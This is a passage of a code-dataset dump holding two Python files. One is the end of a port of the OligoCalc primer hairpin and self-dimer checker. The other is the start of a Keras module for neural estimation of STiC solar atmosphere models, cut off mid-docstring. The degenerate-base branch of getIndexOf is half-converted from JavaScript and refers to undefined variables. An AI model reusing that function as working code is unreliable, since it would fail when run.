theResult[1],\n len(theFullSequence) - compPos - 1,\n theResults\n )\n if (theResult[1] > maxMatch):\n maxMatch = theResult[1]\n # ; // move forward to guarantee nothing else is found that is a reasonable match\n seqPos = theResult[0] + theResult[1] - minHairpinLength\n if (seqPos + minHairpinLength >= maxSeqLength):\n # ; // move compPos forward to stop identical checks if long match was found!\n compPos += maxMatch - minHairpinLength\n break # ; // we have moved far enough on the primer to guarantee we have everything - further would give us the reverse match\n else:\n if (maxMatch > minHairpinLength):\n # ; // move compPos forward to stop identical checks if long match was found!\n compPos += maxMatch - minHairpinLength\n break # ; // not found in the rest of the sequence!\n # if (debugHairpin) primerWin.document.write(\"<\/PRE>\")\n return theResults\n\n\ndef DoHairpinArrayInsert(a, b, c, d, results):\n arrayCount = len(results)\n if (a >= c or a >= b or c >= d or b >= c):\n # if (debugHairpin) primerWin.document.write(\"DoHairpinArrayInsert: ERROR IN VALUES PASSED! [0]=\" + a + \"; [1]=\" + b + \"; [2]=\" + c + \"; [3]=\" + d + \";<BR>\\n\")\n return results\n\n for i in range(arrayCount):\n if (results[i][0] <= a and results[i][1] >= b and results[i][2] <= c and results[i][3] >= d):\n return results\n if (results[i][0] >= a and results[i][1] <= b and results[i][2] >= c and results[i][3] <= d):\n results[i][0] = a\n results[i][1] = b\n results[i][2] = c\n results[i][3] = d\n # if (debugHairpin) primerWin.document.write(\"DoHairpinArrayInsert: position \" + i + \" in results replaced with [0]=\" + a + \"; [1]=\" + b + \"; [2]=\" + c + \"; [3]=\" + d + \";
    \")\n return results\n\n # results[arrayCount] = [0, 0, 0, 0]\n results.append([0, 0, 0, 0]) # MYMOD\n results[arrayCount][0] = a\n results[arrayCount][1] = b\n results[arrayCount][2] = c\n results[arrayCount][3] = d\n # if (debugHairpin) primerWin.document.write(\"DoHairpinArrayInsert: arrayCount=\" + arrayCount + \"; [0]=\" + a + \"; [1]=\" + b + \"[2]=\" + c + \"; [3]=\" + d + \";
    \")\n return results\n\n\ndef getIndexOf(seq, subSeq, startIndex, minMatch):\n # // look for subSeq in seq\n # / * returns an array where\n # theResult[0] is the index of the first match of subseq that is of at least length minMatch in seq\n # theResult[1] is the length of the match\n # * /\n theResult = [-1, -1]\n # theResult[0] = -1\n # theResult[1] = -1\n global broadMatch\n if (not broadMatch):\n for k in range(minMatch, len(subSeq)+1):\n # // can replace this with seq.search for GREP capabilities\n try:\n theMatch = seq.index(subSeq[0:k], startIndex)\n except ValueError:\n break\n theResult[0] = theMatch\n theResult[1] = k\n # if (debugHairpin) primerWin.document.write(\"(\" + theMatch + \",\" + k + \") \")\n else:\n for i in range(startIndex, len(seq)):\n if (isBaseEqual(seq[i], subSeq[0])):\n for j in range(len(subSeq)):\n if (not isBaseEqual(seq[i + j], subSeq[j])):\n break\n elif (j >= minMatch - 1):\n theResult[0] = theMatch\n theResult[1] = k\n if (j == subSeq.length):\n theResult[0] = theMatch\n theResult[1] = k\n # if (debugHairpin) primerWin.document.write(\"TheResult[0]=\" + theResult[0] + \" (first match); TheResult[1]=\" + theResult[1] + \";
    \")\n return theResult\n\n\ndef makeMatrix(matLength):\n return [[0 for _ in range(matLength)] for _ in range(matLength)]\n # var theMatrix = new Array(matLength)\n # for (var i=0\n # i < matLength\n # i++) {\n # // increment column\n # theMatrix[i] = new Array(matLength)\n # }\n # return theMatrix\n\n\ndef fillMatchMatrix(cols, rows, mat):\n d = len(cols)\n\n if (d < 4):\n return\n global broadMatch\n if (broadMatch):\n # // Do the degenerate thing!\n for i in range(d):\n # // increment column\n for j in range(d):\n # // increment row\n if (isBaseEqual(cols[i], rows[j])):\n mat[i][j] = 1\n if (i > 0 and j > 0):\n mat[i][j] += mat[i - 1][j - 1]\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n if (i > 1 and j > 1):\n if (mat[i - 1][j - 1] > mat[i - 2][j - 2] and mat[i - 1][j - 1] > 1 and i < d - 1 and j < d - 1):\n # // allow one base mismatch only if there are at least 2 matched base on 5' and at least 1 matched base on 3'\n mat[i][j] = mat[i - 1][j - 1]\n elif (i < d - 1 and j < d - 1):\n mat[i - 1][j - 1] = 0\n else:\n for i in range(2):\n for j in range(2):\n # // increment column\n # // increment row\n if (cols[i] == rows[j]):\n mat[i][j] = 1\n if (i and j):\n mat[i][j] += mat[i - 1][j - 1]\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n for i in range(2, d - 1):\n # // increment column\n for j in range(2, d - 1):\n # // increment row\n if (cols[i] == rows[j]):\n mat[i][j] = mat[i - 1][j - 1] + 1\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n if (mat[i - 1][j - 1] > 1 and cols[i + 1] == rows[j + 1]):\n # // allow one base mismatch only if there are at least 2 matched base on 5' and at least 1 matched base on 3'\n mat[i][j] = mat[i - 1][j - 1]\n i = d - 1\n j = i\n # // increment column\n # // increment row\n if (cols[i] == rows[j]):\n mat[i][j] = 1\n mat[i][j] += mat[i - 1][j - 1]\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n\n\ndef makeAlignedArray(mat, minLen, maxMisMatch):\n # // assumes an orthogonal matrix\n # /* theAlignedArray is a bit strange in the second dimension. 
Assume it is a length 5 array called 'theResults'\n # theResults[0] == start index\n # theResults[1] == start matching index in reverse complement seq\n # theResults[2] == end index of aligned bases (inclusive)\n # theResults[3] == end matching index in reverse complement Seq\n # theResults[4] == number of mismatches\n # */\n\n matLength = len(mat)\n count = 0\n theResults = []\n i = None\n j = None\n k = None\n mismatches = None\n for i in range(matLength):\n for j in range(matLength):\n if (mat[i][j] == 1): # //potential start of an alignment\n mismatches = 0\n hasMatch = 1\n lastMatch = 1\n maxInc = matLength - (j if i <= j else i)\n for k in range(1, maxInc):\n hasMatch = mat[i + k][j + k]\n if (not hasMatch):\n break\n if (hasMatch <= lastMatch):\n if (mismatches >= maxMisMatch):\n break\n mismatches += 1\n lastMatch = hasMatch\n\n if (k - mismatches >= minLen):\n if count == len(theResults):\n theResults.append(None)\n theResults[count] = [0, 0, 0, 0, 0]\n theResults[count][0] = i # ; //start index\n # ; //start matching index in reverse complement seq\n theResults[count][1] = j\n # ; //end index of aligned bases (inclusive)\n theResults[count][2] = i + k - 1\n # ; //end matching index in reverse complement Seq\n theResults[count][3] = j + k - 1\n theResults[count][4] = mismatches # ; //mismatch counts\n count += 1\n\n return theResults\n\n\ndef sortAlignedArray(alignedArray):\n # // assumes an orthogonal matrix\n # / * theAlignedArray is a bit strange in the second dimension. Assume it is a length 5 array called 'theResults'\n # theResults[0] == start index\n # theResults[1] == start matching index in reverse complement seq\n # theResults[2] == end index of aligned bases(inclusive)\n # theResults[3] == end matching index in reverse complement Seq\n # theResults[4] == number of mismatches\n # * /\n if (len(alignedArray) > 2):\n if (1 == 2):\n tempArray = [0, 0, 0, 0, 0]\n swapped = 0\n run_once = True\n # // bubble sort\n while (swapped == 1) or run_once:\n run_once = False\n swapped = 0\n for n in range(len(alignedArray) - 2):\n if (alignedArray[n][2] - alignedArray[n][0] < alignedArray[n + 1][2] - alignedArray[n + 1][0]):\n for i in range(5):\n tempArray[i] = alignedArray[n][i]\n alignedArray[n][i] = alignedArray[n + 1][i]\n alignedArray[n + 1][i] = tempArray[i]\n swapped = 1\n else:\n alignedArray = sorted(alignedArray, key=arrayOrder()) # MYMOD\n\n return alignedArray\n\n\ndef comparator(mycmp):\n class K:\n def __init__(self, obj, *args):\n self.obj = obj\n\n def __lt__(self, other):\n return mycmp(self.obj, other.obj) < 0\n\n def __gt__(self, other):\n return mycmp(self.obj, other.obj) > 0\n\n def __eq__(self, other):\n return mycmp(self.obj, other.obj) == 0\n\n def __le__(self, other):\n return mycmp(self.obj, other.obj) <= 0\n\n def __ge__(self, other):\n return mycmp(self.obj, other.obj) >= 0\n\n def __ne__(self, other):\n return mycmp(self.obj, other.obj) != 0\n\n return K\n\n\ndef arrayOrder():\n def mycmp(a, b):\n # //size plus position\n return (1 if ((a[2] - a[0]) < (b[2] - b[0])) else (-1 if ((a[2] - a[0]) > (b[2] - b[0])) else (a[0] - a[1]) - (b[0] - b[1])))\n\n return comparator(mycmp)\n\n\ndef isBaseEqual(c1, c2):\n if (c1 == c2):\n return True\n global broadMatch\n if (broadMatch):\n if (c1 == 'N' or c2 == 'N'):\n return True\n\n equA = \"AMRWVHD\"\n # // lack of 'M' caught by Paul Wayper. Thanks Paul!\n equT = \"TWYKHDB\"\n equG = \"GRSKVDB\"\n equC = \"CMSYVHB\"\n # // lack of 'M' caught by Paul Wayper. 
Thanks Paul!\n\n if (c1 == 'A'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'T'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'G'):\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'C'):\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'M'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'R'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'W'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equT.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'S'):\n try:\n equG.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'Y'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'K'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n\n if (c1 == 'V'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'H'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'D'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'B'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n return False\n\n\n# // return string containing all hairpins\ndef displayHairpin(theHairpinArray, theSequence):\n returnString = \"\"\n # s1 = \"\"\n # d = len(theSequence)\n # i, j = 0, 0\n theHairpinArrayLength = len(theHairpinArray)\n # Potential hairpin formation: \"\n returnString = returnString + \"Number of harpins: \"\n if (theHairpinArrayLength > 0):\n if (theHairpinArrayLength > 1):\n if (theHairpinArray[theHairpinArrayLength - 1][1] == theHairpinArray[theHairpinArrayLength - 2][1] and (theHairpinArray[theHairpinArrayLength - 1][2] == theHairpinArray[theHairpinArrayLength - 2][2])):\n theHairpinArrayLength = theHairpinArrayLength - 1\n # // get rid of the last one\n # for i in range(theHairpinArrayLength):\n # # // add a bar between 2 legs of the hairpin if bases in the 2nd leg is contiguous to the 1st leg\n # # // substring wants a value from the start location to 1+the end location\n # s1 = theSequence.substring(0, theHairpinArray[i][0]) +\n # theSequence.substring(theHairpinArray[i][0], theHairpinArray[i][1] + 1).fontcolor(\"red\") +\n # ((theHairpinArray[i][1] + 1 >= theHairpinArray[i][2]) ? 
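\n #\n # --- Editorial note: hedged, table-driven equivalent of the isBaseEqual()\n # chain above (IUPAC base sets; illustration only, names hypothetical):\n #\n # _IUPAC = {'A': 'A', 'C': 'C', 'G': 'G', 'T': 'T', 'M': 'AC', 'R': 'AG',\n #           'W': 'AT', 'S': 'CG', 'Y': 'CT', 'K': 'GT', 'V': 'ACG',\n #           'H': 'ACT', 'D': 'AGT', 'B': 'CGT', 'N': 'ACGT'}\n #\n # def _bases_compatible(c1, c2):\n #     return c1 == c2 or bool(set(_IUPAC[c1]) & set(_IUPAC[c2]))\n #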
\"-\": \"\") +\n # theSequence.substring(theHairpinArray[i][1] + 1, theHairpinArray[i][2]) +\n # theSequence.substring(theHairpinArray[i][2], theHairpinArray[i][3] + 1).fontcolor(\"red\") +\n # theSequence.substring(theHairpinArray[i][3] + 1, d)\n # returnString = returnString + \"5' \" + s1 + \" 3'
    \"\n\n returnString += str(theHairpinArrayLength)\n # returnString = returnString + \"
    \"\n else:\n returnString += \" 0\"\n\n return returnString\n\n\ndef display3EndDimer(theOligo, theAlignedArray):\n d = len(theOligo.Sequence)\n returnString = \"\"\n # s1 = \"\"\n # s2 = \"\"\n # // 3' complementarity\n returnString += \"3' Complementarity: \"\n N = 0\n\n for n in range(len(theAlignedArray)):\n # // end position of match in original seq\n if (theAlignedArray[n][2] == d - 1):\n N += 1\n\n returnString += f\"{N}\"\n return returnString\n\n\n# // all possible dimerization sites\ndef displayAllDimers(theAlignedArray, theSequence, reversedSeq):\n # / * theAlignedArray is a bit strange in the second dimension. Assume it is a length 5 array called 'theResults'\n # theResults[0] == start index\n # theResults[1] == start matching index in reverse complement seq\n # theResults[2] == end index of aligned bases(inclusive)\n # theResults[3] == end matching index in reverse complement Seq\n # theResults[4] == number of mismatches\n # * /\n # d = len(theSequence)\n returnString = \"\"\n # s1 = \"\"\n # s2 = \"\"\n # maxoffset = 0\n # offset, j, n = None, None, None\n # offsetStr, maxoffsetStr = None, None\n # // all other possible alignment sites\n returnString += \"All potential self-annealing sites are marked in red (allowing 1 mis-match): \"\n if (len(theAlignedArray) > 1):\n returnString += str(len(theAlignedArray))\n else:\n returnString += \"0\"\n\n # returnString += \"\\n\"\n return returnString\n\n\ndef reverseString(string):\n return string[::-1]\n\n\ndef stringToArray(string):\n return list(string)\n\n\ndef calcPrimer(form):\n # theStart = None\n # theEnd = None\n # calcStart = datetime.now()\n\n if (len(form.oligoBox) < 8):\n raise ValueError(\n \"Please enter at least 8 bases before checking for self-complementarity!\")\n\n theOligo, theComplement = Start(form)\n\n if (theOligo.seqArray):\n del theOligo.seqArray\n if (theOligo.revSeqArray):\n del theOligo.revSeqArray\n if (theComplement.seqArray):\n del theComplement.seqArray\n if (theComplement.revSeqArray):\n del theComplement.revSeqArray\n\n theOligo.revSequence = reverseString(theOligo.Sequence)\n theComplement.revSequence = reverseString(theComplement.Sequence)\n\n theOligo.seqArray = stringToArray(theOligo.Sequence)\n theOligo.revSeqArray = stringToArray(theOligo.revSequence)\n theComplement.seqArray = stringToArray(theComplement.Sequence)\n theComplement.revSeqArray = stringToArray(theComplement.revSequence)\n\n # // change if removing the hairpin selection options\n\n global minAlignLen\n global minHairpinLen\n\n minAlignLen = int(form.selfComp) # // for 3' complementarity\n minHairpinLen = int(form.hairpin) # // for hairpin\n\n # // minAlignLen = parseInt(form.selfComp.value)\n # // minHairpinLen = parseInt(form.hairpin.value)\n global broadMatch\n broadMatch = False\n # // True: do all degenerate comparisons\n # // now create window\n # primerWin = window.open(\n # \"\", 'primer', 'width=700,toolbar=0,location=0,directories=0,status=1,menuBar=1,scrollBars=1,resizable=1')\n # // primerWin.document.open(\"text/html\")\n # print(\n # \"Oligo Self Complementarity Check<\\/TITLE><\\/HEAD>\")\n # primerWin.document.write('<STYLE type=\"text\\/css\">')\n # primerWin.document.write('<!--')\n # if (isMac and browserVersion < 5.0) {\n # primerWin.document.write(MacStyleSheet)\n # } else {\n # primerWin.document.write(PCStyleSheet)\n # }\n # primerWin.document.write('-->')\n # primerWin.document.write('<\\/STYLE>')\n # print(\"<BODY BGCOLOR=white>\")\n # print(\n # \"Minimum base pairs required for single primer 
self-dimerization: \" + minAlignLen + \".<BR>\")\n # print(\n # \"Minimum base pairs required for a hairpin: \" + minHairpinLen + \".<BR>\")\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - initialize window took \" + (theEnd - calcStart) + \" ms<br>\")\n calculateMatrices(theOligo, theComplement)\n # // do this after the window is in place so we can print diagnostics if necessary\n # anchorString = \"\"\n # print(anchorString.anchor(\"strictMatches\"))\n # if (theOligo.hasIUpacBase) {\n # print(\"Your oligo contains degenerate bases.<BR>\")\n # print(\n # \"The strictMatch section displays only <font COLOR='RED'>perfect matches <\\/FONT>in the case of degenerate bases.<BR>\")\n # print(\n # \"For Example:<BR> <PRE> 'N' matches only with 'N';<BR> 'R' matches only with 'S';<BR> 'W' matches only with 'W'; etc.<\\/PRE><P>\")\n # hrefString = \"view all matches.\"\n # print(\n # \"Scroll down to view <font COLOR='GREEN'><a href='#allMatches'>all Matches<\\/a><\\/FONT>\")\n # }\n print(displayHairpin(theHairpinArray, theOligo.Sequence), end='\\t')\n\n # if (!isCompatible) {\n # print(\n # \"<p><b>Sorry, the hairpin loop calculation is only available if you are using Netscape or IE 4.0 or higher!\\n<\\/B><br>\")\n # } else {\n # theStart = datetime.now()\n # print(displayHairpin(\n # theHairpinArray, theOligo.Sequence))\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - displayHairpin took \" + (theEnd - theStart) + \" ms<br>\")\n # }\n # theStart = datetime.now()\n\n print(display3EndDimer(theOligo, theAlignedArray), end='\\t')\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - display3EndDimer took \" + (theEnd - theStart) + \" ms<br>\")\n # theStart = datetime.now()\n print(displayAllDimers(theAlignedArray, theOligo.Sequence, theOligo.revSequence))\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - displayAllDimers took \" + (theEnd - theStart) + \" ms<br>\")\n # theStart = datetime.now()\n if (theOligo.hasIUpacBase):\n calcDegeneratePrimers(theOligo, theComplement)\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - all calls to close took \" + (theEnd - calcStart) + \" ms<br>\")\n # print(\"<\\/BODY><\\/HTML>\")\n # primerWin.document.close()\n # primerWin.focus()\n # return False\n\n\nif __name__ == \"__main__\":\n sequence = argv[1]\n form = Input(oligoBox=sequence)\n if len(argv) == 3:\n form.selfComp = int(argv[2])\n form.hairpin = int(argv[3])\n else:\n form.selfComp = 3\n form.hairpin = 3\n calcPrimer(form)\n","sub_path":"bin/OligoCalcCompare.py","file_name":"OligoCalcCompare.py","file_ext":"py","file_size_in_byte":29909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"436730766","text":"import copy\nimport numpy as np\nimport os\nimport random\nimport sys\nimport time\nimport warnings\nfrom contextlib import redirect_stdout\nimport ipdb\n\nwith warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\n# To deactivate warnings: https://github.com/tensorflow/tensorflow/issues/7778\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\n# No more available\n# import keras.backend.tensorflow_backend as ktf\nfrom keras.callbacks import Callback, ModelCheckpoint\nfrom keras.layers import Input, Conv2D, add, Activation\nfrom keras.layers import Lambda\nfrom keras.layers.advanced_activations import ELU\nfrom keras.layers.merge import 
concatenate\nfrom keras.models import Model\n\n# https://github.com/tensorflow/tensorflow/issues/23728\n# from keras.optimizers import Adam\nfrom tensorflow.keras.optimizers import Adam\n\nfrom keras.regularizers import l2\nfrom keras.utils.data_utils import Sequence\n\nimport sparsetools as sp\nfrom ISPy.util import gentools\n\n\n# ==================================================================================\nclass DataGenerator(Sequence):\n \"\"\"Generates data for training a neural network from a STiC model \n\n :Authors: \n Carlos Diaz (ISP/SU 2020)\n \"\"\"\n\n def __init__(self, datasize, dx, batch_size, logtau, stokelist, cubelist, noise):\n 'Initialization'\n self.n_training_orig = datasize\n self.batch_size = batch_size\n self.dx = dx\n self.noise = noise # CHECK THAT IM USING NOISE!\n self.logtau = logtau\n self.stokelist = np.array(stokelist)\n self.cubelist = np.array(cubelist)\n self.batchs_per_epoch_training = int(self.n_training_orig / self.batch_size)\n self.n_training = self.batchs_per_epoch_training * self.batch_size\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n input_train_get, output_train_get = self.__data_generation(self)\n return input_train_get, output_train_get\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return self.batchs_per_epoch_training\n\n def __data_generation(self, list_IDs_temp):\n 'Generates data containing batch_size samples'\n\n stokes = self.stokelist[0, :]\n cube = self.cubelist[0, :]\n nl, ny, nx = stokes.shape\n ntau, ny, nx = cube.shape\n Lx = nx\n Ly = ny\n dx = self.dx\n\n # Regularization\n jitterOption = True\n mulitplyJitter = 2\n mynoisecube = 1e-2\n\n input_train = np.zeros((self.batch_size, dx, dx, int(nl)))\n output_train = np.zeros((self.batch_size, dx, dx, int(ntau)))\n for j in range(self.batch_size):\n randi = random.randint(0, self.stokelist.shape[0] - 1)\n stokes = self.stokelist[randi, :]\n\n xpos = random.randint(0, Lx - dx)\n ypos = random.randint(0, Ly - dx)\n rota = random.randint(0, 3)\n\n ni = len(self.logtau)\n ministokes = stokes[:,ypos:ypos + dx, xpos:xpos + dx] \n\n lenq = cube.shape[0]\n minicube = np.zeros((lenq, ministokes.shape[1], ministokes.shape[2]))\n\n for iq in range(lenq):\n jitterX = random.randint(-1 * mulitplyJitter, +1 * mulitplyJitter)\n jitterY = random.randint(-1 * mulitplyJitter, +1 * mulitplyJitter)\n if jitterOption is False:\n jitterY, jitterX = 0, 0\n\n import scipy.ndimage as nd\n minicube[iq, :, :] = nd.shift(cube[iq, ypos:ypos + dx, xpos:xpos + dx],\n (jitterY, jitterX), mode='nearest')\n\n # Extra noise\n minicube = minicube[:] + minicube * np.random.normal(0., mynoisecube,(cube.shape[0], dx, dx))\n ministokes = ministokes[:] + np.random.normal(0.,self.noise,(stokes.shape[0],dx,dx))\n\n from ISPy.util.azimuth import BTAZI2BQBU_cube\n minicube[ni * 4:5 * ni, :, :], minicube[ni * 5:6 * ni, :, :] = BTAZI2BQBU_cube(\n minicube[ni * 4:5 * ni, :, :], minicube[ni * 5:6 * ni, :, :])\n\n input_train[j, :, :, :] = gentools.rotate_cube(np.swapaxes(ministokes, 0, 2), rota)\n output_train[j, :, :, :] = gentools.rotate_cube(np.swapaxes(minicube, 0, 2), rota)\n\n return input_train, output_train\n\n\n\n\n# ==================================================================================\ndef network1D(nx, ny, nd, nq, activation='relu', n_filters=64, l2_reg=1e-7):\n \"\"\" Neural network architecture \n \n :Authors: \n Carlos Diaz (ISP/SU 2020)\n\n \"\"\"\n\n def minires(inputs, n_filters, kernel=1):\n x = Conv2D(int(n_filters), (kernel, kernel), 
padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(inputs)\n x = ELU(alpha=1.0)(x)\n x = Conv2D(n_filters, (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(x)\n return x\n\n def myblock(inputs, n_filters, kernel=1):\n x = Conv2D(n_filters, (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(inputs)\n xo = ELU(alpha=1.0)(x)\n x = Conv2D(n_filters, (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(xo)\n x = ELU(alpha=1.0)(x)\n x = add([x, xo])\n return x\n\n inputs = Input(shape=(nx, ny, nd)) # depth goes last in TensorFlow\n nd4 = int(nd/4)\n\n # TEMP\n x1 = myblock(inputs, n_filters)\n x1 = minires(x1, int(nq / 6))\n # x1 = Activation('elu')(x1) \n x1 = Lambda(lambda x: x + 5.0)(x1)\n\n # VLOS\n x2 = myblock(inputs, n_filters)\n x2 = minires(x2, int(nq / 6))\n\n # VTURB\n x3 = myblock(inputs, n_filters)\n x3 = minires(x3, int(nq / 6))\n # x3 = Activation('relu')(x3)\n\n # BLONG\n xV = Lambda(lambda x: concatenate([x[:,:,:, 0:nd4], x[:,:,:, 1*nd4:2*nd4], \n x[:,:,:, 2*nd4:3*nd4], 100*x[:,:,:, 3*nd4:]]) )(inputs)\n x4 = myblock(xV, n_filters)\n x4 = minires(x4, int(nq / 6))\n\n # BHOR - BQ\n xQ = Lambda(lambda x: concatenate([x[:,:,:, 0:nd4], 100*x[:,:,:, 1*nd4:2*nd4], \n x[:,:,:, 2*nd4:3*nd4], x[:,:,:, 3*nd4:]]) )(inputs)\n x5 = myblock(xQ, n_filters)\n x5 = minires(x5, int(nq / 6))\n\n # BHOR - BU\n xU = Lambda(lambda x: concatenate([x[:,:,:, 0:nd4], x[:,:,:, 1*nd4:2*nd4], \n 100*x[:,:,:, 2*nd4:3*nd4], x[:,:,:, 3*nd4:]]) )(inputs)\n x6 = myblock(xU, n_filters)\n x6 = minires(x6, int(nq / 6))\n\n final = concatenate([x1, x2, x3, x4, x5, x6])\n return Model(inputs=inputs, outputs=final)\n\n\n# ==================================================================================\nclass deep_network(object):\n \"\"\"Deep neural network class: it defines the network, load the weigths, does the \n training and the predictions. 
\n\n :Authors: \n Carlos Diaz (ISP/SU 2020)\n\n \"\"\"\n def __init__(self, root, logtau, nl):\n self.root = root\n self.nl = nl\n self.logtau = logtau\n self.ntau = len(self.logtau) * 6\n self.dx = 20\n self.nx, self.ny = self.dx, self.dx\n self.nworker = 16\n\n def define_network(self):\n print(\"[INFO] Setting up network from scratch\")\n self.model = network1D(self.nx, self.ny, int(self.nl), int(self.ntau))\n\n def read_network(self):\n print(\"[INFO] Setting up network and loading weights {0}_weights.hdf5\".format(self.root))\n self.model = network1D(self.nx, self.ny, int(self.nl), int(self.ntau))\n self.model.load_weights(\"{0}_weights.hdf5\".format(self.root))\n\n def train(self, n_iterations, stokelist, cubelist, extranoise, learning_rate, batch_size,\n datasize):\n self.n_training_orig = datasize\n self.batch_size = batch_size\n self.n_validation_orig = int(batch_size)\n self.lr = learning_rate\n self.noise = extranoise\n self.batchs_per_epoch_training = int(self.n_training_orig / self.batch_size)\n self.batchs_per_epoch_validation = int(self.n_validation_orig / self.batch_size)\n self.n_training = self.batchs_per_epoch_training * self.batch_size\n self.n_validation = self.batchs_per_epoch_validation * self.batch_size\n\n self.model.compile(loss='mean_absolute_error', optimizer=Adam(lr=self.lr))\n print(\"[INFO] Training network during {} epochs:\".format(n_iterations))\n losses = []\n self.checkpointer = ModelCheckpoint(filepath=\"{0}_weights.hdf5\".format(self.root),\n verbose=2, save_best_only=False)\n\n # Generators\n training_generator_class = DataGenerator(self.n_training_orig, self.dx, self.batch_size,\n self.logtau, stokelist, cubelist, self.noise)\n validation_generator_class = DataGenerator(self.n_validation_orig, self.dx, self.batch_size,\n self.logtau, stokelist, cubelist, self.noise)\n \n self.metrics = self.model.fit_generator(training_generator_class,\n self.batchs_per_epoch_training, epochs=n_iterations,\n callbacks=[self.checkpointer],\n validation_data=validation_generator_class,\n validation_steps=self.batchs_per_epoch_validation,\n use_multiprocessing=True, workers=self.nworker)\n\n def read_and_predict(self, inputdata):\n print(\"[INFO] Setting up network for predictions\")\n\n # print(inputdata.shape)\n self.nx = inputdata.shape[3]\n self.ny = inputdata.shape[2]\n self.nl = inputdata.shape[1]\n self.ntau = len(self.logtau) * 6\n\n self.model = network1D(self.nx, self.ny, int(self.nl), int(self.ntau))\n print(\"[INFO] Loading network weights: {0}_weights.hdf5\".format(self.root))\n self.model.load_weights(\"{0}_weights.hdf5\".format(self.root))\n\n input_validation = np.zeros((1, self.nx, self.ny, self.nl), dtype='float32')\n input_validation[0, :, :, :] = inputdata.T[:, :, :, 0]\n\n start = time.time()\n out = self.model.predict(input_validation)\n end = time.time()\n print(\"[INFO] Prediction took: {0:3.2} seconds\".format(end - start))\n\n print(\"[INFO] Azimuth inverse transformation\")\n from ISPy.util.azimuth import BQBU2BTAZI_cube\n # Inverse transformation\n out = np.reshape(out, (input_validation.shape[0], self.nx, self.ny, 6, 9))\n out[0, :, :, 4, :], out[0, :, :, 5, :] = BQBU2BTAZI_cube(out[0, :, :, 4, :], out[0, :, :, 5, :])\n out = np.reshape(out, (input_validation.shape[0], self.nx, self.ny, 54))\n\n return out\n\n\n# ==================================================================================\nclass neural_estimator(object):\n \"\"\"Creates a small neural network that can be trained with STiC results\n to perform faster inversions on new 
data. Note: data index np.where(o.weights[:, 0] < 1.0)[0]\n\n\n Example\n -------\n >>> from ISPy.util import neural_estimation as nst\n >>> import sparsetools as sp\n\n # Reading data in STiC format:\n >>> model_train_list = ['model.nc']\n >>> stokes_train_list = ['profiles.nc']\n >>> logtau = [-7,-6,-5,-4,-3,-2,-1, 0, 1]\n\n # Initializing the neural network\n >>> myestimator = nst.neural_estimator()\n >>> myestimator.train(name='network1',option='start',nepochs=40,model_train_list,stokes_train_list,logtau)\n >>> myestimator.quickplot(filename ='testplot.pdf')\n\n >>> dataprediction = 'newprofiles.nc'\n >>> original_logtau = sp.model(model_train_list[0],0,0,0).ltau[0,0,0,:]\n >>> myestimator.predict(name='network1',dataprediction,logtau,original_logtau,\"model_output.nc\")\n \n :Authors: \n Carlos Diaz (ISP/SU 2020)\n\n \"\"\"\n def __init__(self):\n # self.name = name\n self.init = 0\n self.num_params = 6\n self.logtau = 0\n self.nl = None\n\n def predict(self, name, inputdata, logtau, original_logtau, nameoutput='model_neuralnetwork.nc', pgastop = 1.0):\n \"\"\"It uses a pre-trained neural network with new observed data\n\n Parameters\n ----------\n name : str, optional\n name of the network, by default 'network1'\n inputdata : ncfile\n input file in STiC format\n logtau : list\n logtau scale used to train the network\n original_logtau : list\n Final stratification of the model to do the interpolation\n nameoutput : str, optional\n name of the output model, by default 'model_neuralnetwork.nc'\n\n Example\n -------\n >>> dataprediction = 'newprofiles.nc'\n >>> original_logtau = sp.model(model_train_list[0],0,0,0).ltau[0,0,0,:]\n >>> 